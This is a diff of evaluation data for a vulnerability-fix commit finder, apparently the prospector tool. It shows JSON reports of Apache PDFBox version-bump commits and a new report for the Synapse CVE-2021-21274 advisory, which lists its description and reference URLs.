{}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "1.8.15" - ], - "matched_rules": [] - }, - { - "commit_id": "e0af8f4fdbe867d065099dbab6629da4ad957e9e", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523716510, - "hunks": 1, - "message": "replaced oraclejdk7 with openjdk7 as the oracle version is no longer supported git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829148 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/.travis.yml b/.travis.yml", - "index 8ec4faa61..22c784485 100644", - "--- a/.travis.yml", - "+++ b/.travis.yml", - "@@ -23,3 +23,3 @@ jdk:", - " - oraclejdk8", - "- - oraclejdk7", - "+ - openjdk7" - ], - "changed_files": [ - ".travis.yml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [] - }, - { - "commit_id": "3d4846fbb72b6ec57b8dcd8bd36760402c8217fa", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529950955, - "hunks": 16, - "message": "[maven-release-plugin] prepare release 2.0.11 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834357 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/app/pom.xml b/app/pom.xml", - "index 3b63ef8c3..be401960c 100644", - "--- a/app/pom.xml", - "+++ b/app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11-SNAPSHOT", - "+ 2.0.11", - " ../parent/pom.xml", - "diff --git a/debugger-app/pom.xml b/debugger-app/pom.xml", - "index 05db6b613..fb0ad541f 100644", - "--- a/debugger-app/pom.xml", - "+++ b/debugger-app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11-SNAPSHOT", - "+ 2.0.11", - " ../parent/pom.xml", - "diff --git a/debugger/pom.xml b/debugger/pom.xml", - "index b62f9c818..626d3c719 100644", - "--- a/debugger/pom.xml", - "+++ b/debugger/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11-SNAPSHOT", - "+ 2.0.11", - " ../parent/pom.xml", - "diff --git a/examples/pom.xml b/examples/pom.xml", - "index 8b73b5b69..aac6580d2 100644", - "--- a/examples/pom.xml", - "+++ b/examples/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11-SNAPSHOT", - "+ 2.0.11", - " ../parent/pom.xml", - "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", - "index 9c1bbc6ff..027b01f9f 100644", - "--- a/fontbox/pom.xml", - "+++ b/fontbox/pom.xml", - "@@ -23,3 +23,3 @@", - " pdfbox-parent", - "- 2.0.11-SNAPSHOT", - "+ 2.0.11", - " ../parent/pom.xml", - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index b0c39228e..745f2286b 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -31,3 +31,3 @@", - " pdfbox-parent", - "- 2.0.11-SNAPSHOT", - "+ 2.0.11", - " pom", - "@@ -429,5 +429,5 @@", - " ", - "- scm:svn:http://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", - "- scm:svn:https://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", - "- http://svn.apache.org/viewvc/maven/pom/branches/2.0/pdfbox-parent", - "+ scm:svn:http://svn.apache.org/repos/asf/maven/pom/tags/2.0.11/pdfbox-parent", - "+ scm:svn:https://svn.apache.org/repos/asf/maven/pom/tags/2.0.11/pdfbox-parent", - "+ http://svn.apache.org/viewvc/maven/pom/tags/2.0.11/pdfbox-parent", - " ", - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index be6303e39..5788f62ea 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11-SNAPSHOT", - "+ 2.0.11", - " ../parent/pom.xml", - "diff --git a/pom.xml b/pom.xml", - "index 13c40e96a..bb5300b5d 100644", - "--- a/pom.xml", - "+++ b/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11-SNAPSHOT", - "+ 2.0.11", - " parent/pom.xml", - "@@ -36,8 +36,8 @@", - " ", - "- scm:svn:http://svn.apache.org/repos/asf/pdfbox/branches/2.0", - "+ scm:svn:http://svn.apache.org/repos/asf/pdfbox/tags/2.0.11", - " ", - " ", - "- scm:svn:https://svn.apache.org/repos/asf/pdfbox/branches/2.0", - "+ scm:svn:https://svn.apache.org/repos/asf/pdfbox/tags/2.0.11", - " ", - "- http://svn.apache.org/viewvc/pdfbox/branches/2.0", - "+ http://svn.apache.org/viewvc/pdfbox/tags/2.0.11", - " ", - "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", - "index cc1b043fa..a8733a59b 100644", - "--- a/preflight-app/pom.xml", - "+++ b/preflight-app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11-SNAPSHOT", - "+ 2.0.11", - " ../parent/pom.xml", - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index dc12a0117..f7eb5a9af 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -28,3 +28,3 @@", - " \t\tpdfbox-parent", - "-\t\t2.0.11-SNAPSHOT", - "+\t\t2.0.11", - " \t\t../parent/pom.xml", - "diff --git a/tools/pom.xml b/tools/pom.xml", - "index ab26ab8b6..821dff855 100644", - "--- a/tools/pom.xml", - "+++ b/tools/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11-SNAPSHOT", - "+ 2.0.11", - " ../parent/pom.xml", - "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", - "index 142025bf8..5f8b41f63 100644", - "--- a/xmpbox/pom.xml", - "+++ b/xmpbox/pom.xml", - "@@ -29,3 +29,3 @@", - " \t\tpdfbox-parent", - "-\t\t2.0.11-SNAPSHOT", - "+\t\t2.0.11", - " \t\t../parent/pom.xml" - ], - "changed_files": [ - "app/pom.xml", - "debugger-app/pom.xml", - "debugger/pom.xml", - "examples/pom.xml", - "fontbox/pom.xml", - "parent/pom.xml", - "pdfbox/pom.xml", - "pom.xml", - "preflight-app/pom.xml", - "preflight/pom.xml", - "tools/pom.xml", - "xmpbox/pom.xml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [] - }, - { - "commit_id": "82544a7acecdd25f4156225bf96feef0c804953b", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523900232, - "hunks": 13, - "message": "rollback 1.8.14 release preparation git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1829302 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/ant/pom.xml b/ant/pom.xml", - "index e61e4f675..8ac09774b 100644", - "--- a/ant/pom.xml", - "+++ b/ant/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/app/pom.xml b/app/pom.xml", - "index 2e220897c..a77629018 100644", - "--- a/app/pom.xml", - "+++ b/app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/examples/pom.xml b/examples/pom.xml", - "index 5a637b743..3bfb8beff 100644", - "--- a/examples/pom.xml", - "+++ b/examples/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", - "index 5e4913eff..2713b99dc 100644", - "--- a/fontbox/pom.xml", - "+++ b/fontbox/pom.xml", - "@@ -23,3 +23,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/jempbox/pom.xml b/jempbox/pom.xml", - "index 1920365b4..ad65c38fd 100644", - "--- a/jempbox/pom.xml", - "+++ b/jempbox/pom.xml", - "@@ -23,3 +23,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/lucene/pom.xml b/lucene/pom.xml", - "index 53f5d2567..22f3efc4e 100644", - "--- a/lucene/pom.xml", - "+++ b/lucene/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 93d0066d5..f50b5fb99 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -31,3 +31,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " pom", - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index cc2a1f99e..7c050baff 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/pom.xml b/pom.xml", - "index 0375a4c22..5b96d706f 100644", - "--- a/pom.xml", - "+++ b/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " parent/pom.xml", - "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", - "index f9dc36763..48ba66e1b 100644", - "--- a/preflight-app/pom.xml", - "+++ b/preflight-app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index a05c3c885..7731012a7 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -28,3 +28,3 @@", - " \t\tpdfbox-parent", - "-\t\t1.8.15-SNAPSHOT", - "+\t\t1.8.14-SNAPSHOT", - " \t\t../parent/pom.xml", - "diff --git a/war/pom.xml b/war/pom.xml", - "index cff876942..0bf5f0e7b 100644", - "--- a/war/pom.xml", - "+++ b/war/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.14-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", - "index fb5399bbc..039db8267 100644", - "--- a/xmpbox/pom.xml", - "+++ b/xmpbox/pom.xml", - "@@ -29,3 +29,3 @@", - " \t\tpdfbox-parent", - "-\t\t1.8.15-SNAPSHOT", - "+\t\t1.8.14-SNAPSHOT", - " \t\t../parent/pom.xml" - ], - "changed_files": [ - "ant/pom.xml", - "app/pom.xml", - "examples/pom.xml", - "fontbox/pom.xml", - "jempbox/pom.xml", - "lucene/pom.xml", - "parent/pom.xml", - "pdfbox/pom.xml", - "pom.xml", - "preflight-app/pom.xml", - "preflight/pom.xml", - "war/pom.xml", - "xmpbox/pom.xml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "1.8.14", - "1.8.15", - "1.8.16", - "1.8.17" - ], - "matched_rules": [] - }, - { - "commit_id": "a625e6e1aa6df28a1b345501eefcc5be62a463d2", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529348914, - "hunks": 0, - "message": "[maven-release-plugin] copy for tag 2.0.10 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/tags/2.0.10@1833754 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.10" - ], - "matched_rules": [] - }, - { - "commit_id": "10569b242fca628db93f5a7f5b2cfe7a046fc636", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529950968, - "hunks": 0, - "message": "[maven-release-plugin] copy for tag 2.0.11 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/tags/2.0.11@1834358 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.11" - ], - "matched_rules": [] - }, - { - "commit_id": "d23be8652f6485fabfbbea7344b0a05dbac3242a", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529948681, - "hunks": 17, - "message": "[maven-release-plugin] prepare release 1.8.15 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1834351 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/ant/pom.xml b/ant/pom.xml", - "index e61e4f675..a678fdac4 100644", - "--- a/ant/pom.xml", - "+++ b/ant/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " ../parent/pom.xml", - "diff --git a/app/pom.xml b/app/pom.xml", - "index 2e220897c..6a78d641d 100644", - "--- a/app/pom.xml", - "+++ b/app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " ../parent/pom.xml", - "diff --git a/examples/pom.xml b/examples/pom.xml", - "index 5a637b743..81fc04a5e 100644", - "--- a/examples/pom.xml", - "+++ b/examples/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " ../parent/pom.xml", - "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", - "index 5e4913eff..47da4c91f 100644", - "--- a/fontbox/pom.xml", - "+++ b/fontbox/pom.xml", - "@@ -23,3 +23,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " ../parent/pom.xml", - "diff --git a/jempbox/pom.xml b/jempbox/pom.xml", - "index 1920365b4..80e766c7f 100644", - "--- a/jempbox/pom.xml", - "+++ b/jempbox/pom.xml", - "@@ -23,3 +23,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " ../parent/pom.xml", - "diff --git a/lucene/pom.xml b/lucene/pom.xml", - "index 53f5d2567..f26937c54 100644", - "--- a/lucene/pom.xml", - "+++ b/lucene/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " ../parent/pom.xml", - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 70fbf26fe..0c0dbfa4e 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -31,3 +31,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " pom", - "@@ -321,5 +321,5 @@", - " ", - "- scm:svn:http://svn.apache.org/repos/asf/maven/pom/branches/1.8/pdfbox-parent", - "- scm:svn:https://svn.apache.org/repos/asf/maven/pom/branches/1.8/pdfbox-parent", - "- http://svn.apache.org/viewvc/maven/pom/branches/1.8/pdfbox-parent", - "+ scm:svn:http://svn.apache.org/repos/asf/maven/pom/tags/1.8.15/pdfbox-parent", - "+ scm:svn:https://svn.apache.org/repos/asf/maven/pom/tags/1.8.15/pdfbox-parent", - "+ http://svn.apache.org/viewvc/maven/pom/tags/1.8.15/pdfbox-parent", - " ", - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index cc2a1f99e..29788276c 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " ../parent/pom.xml", - "diff --git a/pom.xml b/pom.xml", - "index a9254568c..b28c065cc 100644", - "--- a/pom.xml", - "+++ b/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " parent/pom.xml", - "@@ -36,8 +36,8 @@", - " ", - "- scm:svn:http://svn.apache.org/repos/asf/pdfbox/branches/1.8", - "+ scm:svn:http://svn.apache.org/repos/asf/pdfbox/tags/1.8.15", - " ", - " ", - "- scm:svn:https://svn.apache.org/repos/asf/pdfbox/branches/1.8", - "+ scm:svn:https://svn.apache.org/repos/asf/pdfbox/tags/1.8.15", - " ", - "- http://svn.apache.org/viewvc/pdfbox/branches/1.8", - "+ http://svn.apache.org/viewvc/pdfbox/tags/1.8.15", - " ", - "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", - "index f9dc36763..0d55d5f8f 100644", - "--- a/preflight-app/pom.xml", - "+++ b/preflight-app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " ../parent/pom.xml", - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index a05c3c885..eccdf62ab 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -28,3 +28,3 @@", - " \t\tpdfbox-parent", - "-\t\t1.8.15-SNAPSHOT", - "+\t\t1.8.15", - " \t\t../parent/pom.xml", - "diff --git a/war/pom.xml b/war/pom.xml", - "index cff876942..b647f52a4 100644", - "--- a/war/pom.xml", - "+++ b/war/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 1.8.15-SNAPSHOT", - "+ 1.8.15", - " ../parent/pom.xml", - "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", - "index fb5399bbc..bbdf06167 100644", - "--- a/xmpbox/pom.xml", - "+++ b/xmpbox/pom.xml", - "@@ -29,3 +29,3 @@", - " \t\tpdfbox-parent", - "-\t\t1.8.15-SNAPSHOT", - "+\t\t1.8.15", - " \t\t../parent/pom.xml" - ], - "changed_files": [ - "ant/pom.xml", - "app/pom.xml", - "examples/pom.xml", - "fontbox/pom.xml", - "jempbox/pom.xml", - "lucene/pom.xml", - "parent/pom.xml", - "pdfbox/pom.xml", - "pom.xml", - "preflight-app/pom.xml", - "preflight/pom.xml", - "war/pom.xml", - "xmpbox/pom.xml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "1.8.15", - "1.8.16", - "1.8.17" - ], - "matched_rules": [] - } - ] -} diff --git a/prospector/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv b/prospector/evaluation/data/input/steady_dataset.csv similarity index 100% rename from prospector/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv rename to prospector/evaluation/data/input/steady_dataset.csv diff --git a/prospector/evaluation/data/reports/steady_dataset/CVE-20201-21274.json b/prospector/evaluation/data/reports/steady_dataset/CVE-20201-21274.json new file mode 100644 index 000000000..ca7685dcf --- /dev/null +++ b/prospector/evaluation/data/reports/steady_dataset/CVE-20201-21274.json @@ -0,0 +1,36097 @@ +{ + "advisory_record": { + "cve_id": "CVE-2021-21274", + "description": "Synapse is a Matrix reference homeserver written in python (pypi package matrix-synapse). Matrix is an ecosystem for open federated Instant Messaging and VoIP. In Synapse before version 1.25.0, a malicious homeserver could redirect requests to their .well-known file to a large file. This can lead to a denial of service attack where homeservers will consume significantly more resources when requesting the .well-known file of a malicious homeserver. This affects any server which accepts federation requests from untrusted servers. Issue is resolved in version 1.25.0. As a workaround the `federation_domain_whitelist` setting can be used to restrict the homeservers communicated with over federation.", + "reserved_timestamp": 1608595200, + "published_timestamp": 1614360316, + "updated_timestamp": 1627869983, + "repository_url": null, + "references": { + "": 475, + "commit::ff5c4da1289cb5e097902b3e55b771be342c29d6": 7, + "https://github.com/matrix-org/synapse/security/advisories/GHSA-2hwx-mjrm-v3g8": 6, + "https://github.com/matrix-org/synapse/pull/8950": 6, + "https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax": 6, + "https://github.com/features/actions": 3, + "https://github.com/features/packages": 3, + "https://github.com/features/security": 3, + "https://github.com/features/codespaces": 3, + "https://github.com/features/copilot": 3, + "https://github.com/features/code-review": 3, + "https://github.com/features/issues": 3, + "https://github.com/features/discussions": 3, + "https://github.com/features": 3, + "https://docs.github.com": 3, + "https://skills.github.com": 3, + "https://github.blog": 3, + "https://github.com/enterprise": 3, + "https://github.com/team": 3, + "https://github.com/enterprise/startups": 3, + "https://github.com/solutions/industries/healthcare": 3, + "https://github.com/solutions/industries/financial-services": 3, + "https://github.com/solutions/industries/manufacturing": 3, + "https://github.com/solutions/ci-cd": 3, + "https://github.com/solutions/devops": 3, + "https://github.com/solutions/devsecops": 3, + "https://resources.github.com/learn/pathways": 3, + "https://resources.github.com": 3, + "https://github.com/customer-stories": 3, + "https://partner.github.com": 3, + "https://github.com/readme": 3, + "https://github.com/topics": 3, + "https://github.com/trending": 3, + "https://github.com/collections": 3, + "https://github.com/enterprise/advanced-security": 3, + "https://github.com/pricing": 3, + "https://github.com": 3, + "https://docs.github.com/site-policy/github-terms/github-terms-of-service": 3, + "https://docs.github.com/site-policy/privacy-policies/github-privacy-statement": 3, + "https://github.com/security": 3, + "https://www.githubstatus.com/": 3, + "https://docs.github.com/": 3, + "https://support.github.com?tags=dotcom-footer": 3, + "https://github.com/matrix-org/synapse/tree/master/docs/admin_api/purge_room.md": 3, + "https://github.com/matrix-org/synapse/tree/master/docs/admin_api/shutdown_room.md": 3, + "https://github.com/matrix-org/synapse/tree/master/docs/admin_api/rooms.md#delete-room-api": 3, + "https://github.com/dklimpel": 3, + "https://github.com/edwargix": 3, + "commit::9389a88816ddb1eeb70f927da804b921aba0facb": 3, + "https://docs.github.com/articles/managing-disruptive-comments/#hiding-a-comment": 3, + "https://github.com/matrix-org/synapse/pull/8756": 3, + "https://github.com/matrix-org/synapse/pull/8853": 3, + "https://github.com/matrix-org/synapse/pull/8874": 3, + "https://github.com/matrix-org/synapse/pull/8886": 3, + "https://github.com/matrix-org/synapse/pull/8887": 3, + "https://github.com/matrix-org/synapse/pull/8890": 3, + "https://github.com/matrix-org/synapse/pull/8897": 3, + "https://github.com/matrix-org/synapse/pull/8900": 3, + "https://github.com/matrix-org/synapse/pull/8911": 3, + "https://github.com/matrix-org/synapse/pull/8938": 3, + "https://github.com/matrix-org/synapse/pull/8941": 3, + "https://github.com/matrix-org/synapse/pull/8942": 3, + "https://github.com/matrix-org/synapse/pull/8951": 3, + "https://github.com/matrix-org/synapse/pull/8930": 3, + "https://github.com/matrix-org/synapse/pull/8931": 3, + "https://github.com/matrix-org/synapse/pull/8821": 3, + "https://github.com/matrix-org/synapse/pull/8870": 3, + "https://github.com/matrix-org/synapse/pull/8954": 3, + "https://github.com/matrix-org/synapse/pull/8970": 3, + "https://github.com/matrix-org/synapse/pull/8994": 3, + "https://github.com/matrix-org/synapse/pull/8827": 3, + "https://github.com/matrix-org/synapse/pull/8837": 3, + "https://github.com/matrix-org/synapse/pull/8858": 3, + "https://github.com/matrix-org/synapse/pull/8862": 3, + "https://github.com/matrix-org/synapse/pull/8865": 3, + "https://github.com/matrix-org/synapse/pull/8867": 3, + "https://github.com/matrix-org/synapse/pull/8872": 3, + "https://github.com/matrix-org/synapse/pull/8883": 3, + "https://github.com/matrix-org/synapse/pull/8918": 3, + "https://github.com/matrix-org/synapse/pull/8920": 3, + "https://github.com/matrix-org/synapse/pull/8921": 3, + "https://github.com/matrix-org/synapse/pull/8933": 3, + "https://github.com/matrix-org/synapse/pull/8964": 3, + "https://github.com/matrix-org/synapse/pull/8937": 3, + "https://github.com/matrix-org/synapse/pull/8945": 3, + "https://github.com/matrix-org/synapse/pull/8959": 3, + "https://github.com/matrix-org/synapse/pull/8962": 3, + "https://github.com/matrix-org/synapse/pull/8965": 3, + "https://github.com/matrix-org/synapse/pull/8971": 3, + "https://github.com/matrix-org/synapse/pull/8975": 3, + "https://github.com/matrix-org/synapse/pull/8977": 3, + "https://github.com/matrix-org/synapse/pull/8802": 3, + "https://github.com/matrix-org/synapse/pull/8839": 3, + "https://github.com/matrix-org/synapse/pull/8873": 3, + "https://github.com/matrix-org/synapse/pull/8891": 3, + "https://github.com/matrix-org/synapse/pull/8987": 3, + "https://github.com/matrix-org/synapse/pull/8992": 3, + "https://github.com/matrix-org/synapse/pull/9002": 3, + "https://github.com/matrix-org/synapse/pull/8829": 3, + "https://github.com/matrix-org/synapse/pull/8856": 3, + "https://github.com/matrix-org/synapse/pull/8958": 3, + "https://github.com/matrix-org/synapse/pull/8861": 3, + "https://github.com/matrix-org/synapse/pull/8864": 3, + "https://github.com/matrix-org/synapse/pull/8879": 3, + "https://github.com/matrix-org/synapse/pull/8880": 3, + "https://github.com/matrix-org/synapse/pull/8882": 3, + "https://github.com/matrix-org/synapse/pull/8901": 3, + "https://github.com/matrix-org/synapse/pull/8940": 3, + "https://github.com/matrix-org/synapse/pull/8943": 3, + "https://github.com/matrix-org/synapse/pull/9020": 3, + "https://github.com/matrix-org/synapse/pull/8881": 3, + "https://github.com/matrix-org/synapse/pull/8905": 3, + "https://github.com/matrix-org/synapse/pull/8906": 3, + "https://github.com/matrix-org/synapse/pull/8909": 3, + "https://github.com/matrix-org/synapse/pull/8916": 3, + "https://github.com/matrix-org/synapse/pull/8935": 3, + "https://github.com/matrix-org/synapse/pull/8929": 3, + "https://github.com/matrix-org/synapse/pull/8946": 3, + "https://github.com/matrix-org/synapse/pull/8952": 3, + "https://github.com/matrix-org/synapse/pull/8963": 3, + "https://github.com/matrix-org/synapse/pull/8973": 3, + "https://github.com/matrix-org/synapse/pull/8976": 3, + "https://github.com/matrix-org/synapse/pull/8979": 3, + "https://github.com/matrix-org/synapse/pull/8980": 3, + "https://github.com/matrix-org/synapse/pull/8986": 3, + "https://github.com/matrix-org/synapse/pull/8998": 3, + "https://github.com/matrix-org/synapse/pull/8999": 3, + "https://github.com/matrix-org/synapse/releases/tag/v1.25.0": 2, + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/": 2, + "https://endoflife.date/": 2, + "https://endoflife.date/python": 2, + "https://endoflife.date/postgresql": 2, + "https://github.com/Bubu": 2, + "https://github.com/fossterer": 2, + "https://github.com/matrix-org/synapse/pull/9108": 1, + "https://github.com/matrix-org/synapse/issues/9084": 1, + "https://github.com/matrix-org/synapse/issues/8756": 1, + "https://github.com/matrix-org/synapse/issues/8853": 1, + "https://github.com/matrix-org/synapse/issues/8874": 1, + "https://github.com/matrix-org/synapse/issues/8886": 1, + "https://github.com/matrix-org/synapse/issues/8887": 1, + "https://github.com/matrix-org/synapse/issues/8890": 1, + "https://github.com/matrix-org/synapse/issues/8897": 1, + "https://github.com/matrix-org/synapse/issues/8900": 1, + "https://github.com/matrix-org/synapse/issues/8911": 1, + "https://github.com/matrix-org/synapse/issues/8938": 1, + "https://github.com/matrix-org/synapse/issues/8941": 1, + "https://github.com/matrix-org/synapse/issues/8942": 1, + "https://github.com/matrix-org/synapse/issues/8951": 1, + "https://github.com/matrix-org/synapse/issues/8930": 1, + "https://github.com/matrix-org/synapse/issues/8931": 1, + "https://github.com/matrix-org/synapse/issues/8821": 1, + "https://github.com/matrix-org/synapse/issues/8870": 1, + "https://github.com/matrix-org/synapse/issues/8954": 1, + "https://github.com/matrix-org/synapse/issues/8970": 1, + "https://github.com/matrix-org/synapse/issues/8994": 1, + "https://github.com/matrix-org/synapse/issues/8827": 1, + "https://github.com/matrix-org/synapse/issues/8837": 1, + "https://github.com/matrix-org/synapse/issues/8858": 1, + "https://github.com/matrix-org/synapse/issues/8862": 1, + "https://github.com/matrix-org/synapse/issues/8865": 1, + "https://github.com/matrix-org/synapse/issues/8867": 1, + "https://github.com/matrix-org/synapse/issues/8872": 1, + "https://github.com/matrix-org/synapse/issues/8883": 1, + "https://github.com/matrix-org/synapse/issues/8918": 1, + "https://github.com/matrix-org/synapse/issues/8920": 1, + "https://github.com/matrix-org/synapse/issues/8921": 1, + "https://github.com/matrix-org/synapse/issues/8933": 1, + "https://github.com/matrix-org/synapse/issues/8964": 1, + "https://github.com/matrix-org/synapse/issues/8937": 1, + "https://github.com/matrix-org/synapse/issues/8945": 1, + "https://github.com/matrix-org/synapse/issues/8959": 1, + "https://github.com/matrix-org/synapse/issues/8962": 1, + "https://github.com/matrix-org/synapse/issues/8965": 1, + "https://github.com/matrix-org/synapse/issues/8971": 1, + "https://github.com/matrix-org/synapse/issues/8975": 1, + "https://github.com/matrix-org/synapse/issues/8977": 1, + "https://github.com/matrix-org/synapse/issues/8802": 1, + "https://github.com/matrix-org/synapse/issues/8839": 1, + "https://github.com/matrix-org/synapse/issues/8873": 1, + "https://github.com/matrix-org/synapse/issues/8891": 1, + "https://github.com/matrix-org/synapse/issues/8987": 1, + "https://github.com/matrix-org/synapse/issues/8992": 1, + "https://github.com/matrix-org/synapse/issues/9002": 1, + 